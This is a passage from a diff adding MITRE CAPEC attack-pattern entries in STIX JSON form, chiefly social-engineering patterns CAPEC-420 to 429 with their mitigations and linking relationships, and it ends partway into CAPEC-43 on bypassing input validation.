"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6de86e67-2849-4490-9556-799ba134737f", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use mail.local", + "id": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-42-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--273ca915-2a10-4a89-8347-e45deeb8176d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22ba1687-e539-480a-897e-2480bbfcdcdb", + "target_ref": "attack-pattern--3c08bb9d-43b5-4468-8b38-387c6cb60da7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary leverages a perception of scarcity to persuade the target to perform an action or divulge information that is advantageous to the adversary. By conveying a perception of scarcity, or a situation of limited supply, the adversary aims to create a sense of urgency in the context of a target's decision-making process.", + "external_references": [ + { + "external_id": "CAPEC-420", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/420.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Scarcity", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary sends an email to a target about a limited-time opportunity to claim a considerable monetary reward. The email contains a link to a site which the adversary says is only active for a short time and to the first person to claim it. By convincing the user of the scarcity of the monetary reward, the adversary aims to persuade them to click on the malicious link in the email." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6ee824b4-e2c0-4406-b7d9-9455b31c810c", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--490d66db-ab96-48b4-ad40-8625319530eb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering technique to convey a sense of authority that motivates the target to reveal specific information or take specific action. There are various techniques for producing a sense of authority during ordinary modes of communication. One common method is impersonation. By impersonating someone with a position of power within an organization, an adversary may motivate the target individual to reveal some piece of sensitive information or perform an action that benefits the adversary.", + "external_references": [ + { + "external_id": "CAPEC-421", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/421.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Authority", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The adversary calls the target and announces that they are the head of IT at the target's company. The adversary goes on to say that there has been a technical issue and they need the target's login credentials for their account. By convincing the target of their authority, the adversary hopes the target will reveal the sensitive information." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--73e7aab7-ed20-4616-ae8f-4708e16de84c", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--effcb600-1cb5-4601-baa6-cb8fc02d586c", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses social engineering to convince the target to do minor tasks as opposed to larger actions. After complying with a request, individuals are more likely to agree to subsequent requests that are similar in type and required effort.", + "external_references": [ + { + "external_id": "CAPEC-422", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/422.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Influence Perception of Commitment and Consistency", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of scarcity can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d680be2b-c855-49c2-9b1f-929dd51b97e4", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Individuals should avoid complying with suspicious requests.", + "id": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-422-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--36560036-998b-4d8b-8e16-e766cd8d1876", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bc29bf9-910a-4f4a-8423-87090f815507", + "target_ref": "attack-pattern--ef383edc-9f3a-405f-9406-3bd186551d35", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by building a relationship where the target has a liking to the adversary. People are more likely to be influenced by people of whom they are fond, so the adversary attempts to ingratiate themself with the target via actions, appearance, or a combination thereof.", + "external_references": [ + { + "external_id": "CAPEC-423", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/423.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Influence Perception of Liking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the types of things that the target likes." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e3cc5859-4cd7-4218-ad1f-c7047264db33", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--57a56016-e387-456e-badf-a60523e58277", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary influences the target's actions by leveraging the inherent human nature to assume behavior of others is appropriate. In situations of uncertainty, people tend to behave in ways they see others behaving. The adversary convinces the target of adopting behavior or actions that is advantageous to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-424", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/424.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Consensus or Social Proof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that leverage the principle of liking can lead to the target performing an action that results in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e6e89355-28b2-4f0e-be9d-bdaab0213673", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--d8a0c0f1-dc07-49d4-9d4a-e96e526a4c69", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses framing techniques to contextualize a conversation so that the target is more likely to be influenced by the adversary's point of view. Framing is information and experiences in life that alter the way we react to decisions we must make. This type of persuasive technique exploits the way people are conditioned to perceive data and its significance, while avoiding negative or avoidance responses from the target. Rather than a specific technique framing is a methodology of conversation that slowly encourages the target to adopt to the adversary's perspective. One technique of framing is to avoid the use of the word \"No\" and to contextualize responses in a manner that is positive. When performed skillfully the target is much more likely to volunteer information or perform actions favorable to the adversary.", + "external_references": [ + { + "external_id": "CAPEC-425", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/425.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Target Influence via Framing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Successful attacks that influence the target via framing into performing an action or sharing sensitive information can result in a variety of consequences that negatively affect the confidentiality of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5843921-552b-4480-815d-43dc331c44bd", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid sharing unnecessary information during interactions beyond what is absolutely required for effective communication.", + "id": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-425-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5f246e08-06d0-46f0-a49f-061d90062966", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0dff928-51e9-432a-adb9-1dd4d3008256", + "target_ref": "attack-pattern--89d61215-2dcb-4684-983b-89a6e519b035", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary incites a behavior from the target by manipulating something of influence. This is commonly associated with financial, social, or ideological incentivization. Examples include monetary fraud, peer pressure, and preying on the target's morals or ethics. The most effective incentive against one target might not be as effective against another, therefore the adversary must gather information about the target's vulnerability to particular incentives.", + "external_references": [ + { + "external_id": "CAPEC-426", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/426.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Incentives", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully incentivize the target into performing an action beneficial to the adversary can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner.The adversary must have knowledge of the incentives that would influence the actions of the specific target." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f6433a46-1658-4501-a2d5-69157cd29ad6", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--346d34f3-13e5-4d95-8e96-4b381e76e132", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary shapes the target's actions or behavior by focusing on the ways human interact and learn, leveraging such elements as cognitive and social psychology. In a variety of ways, a target can be influenced to behave or perform an action through capitalizing on what scholarship and research has learned about how and why humans react to specific scenarios and cues.", + "external_references": [ + { + "external_id": "CAPEC-427", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/427.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence via Psychological Principles", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--eedaef1c-c3fb-4135-a1b5-4b186b9da854" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that successfully influence the target into performing an action via psychological principles can result in a variety of consequences that negatively affect the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "attack-pattern--6d30ec21-b3b4-435d-9045-acd660865e6a", + "attack-pattern--c207660b-d5b1-4928-b472-251f19a094d0", + "attack-pattern--0618a68a-c6e1-4370-82d3-c76fa2745905" + ], + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c110197f-03b6-4bd2-8fc6-22c90a73c5e9", + "modified": "2017-08-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9ce44430-81de-4c5a-8458-402f622af40a", + "target_ref": "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary tailors their communication to the language and thought patterns of the target thereby weakening barriers or reluctance to communication. This method is a way of building rapport with a target by matching their speech patterns and the primary ways or dominant senses with which they make abstractions. This technique can be used to make the target more receptive to sharing information because the adversary has adapted their communication forms to match those of the target. When skillfully employed, the target is likely to be unaware that they are being manipulated.", + "external_references": [ + { + "external_id": "CAPEC-428", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/428.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--6297aac6-1e4d-4c28-9268-52f70584ec5b", + "modified": "2017-05-01T00:00:00.000Z", + "name": "Influence via Modes of Thinking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary gains information via non-verbal means from the target through eye movements.", + "external_references": [ + { + "external_id": "CAPEC-429", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/429.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + } + ], + "id": "attack-pattern--bbd4f017-9a98-495c-889f-68d85aca375a", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Target Influence via Eye Cues", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9e487767-c1e6-45f9-ae01-1fb1e2d6f030" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \"layer\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: --> --> . In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.", + "external_references": [ + { + "external_id": "CAPEC-43", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/43.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--e827def7-6d74-48b4-8cd2-cd0e0ff00aeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": 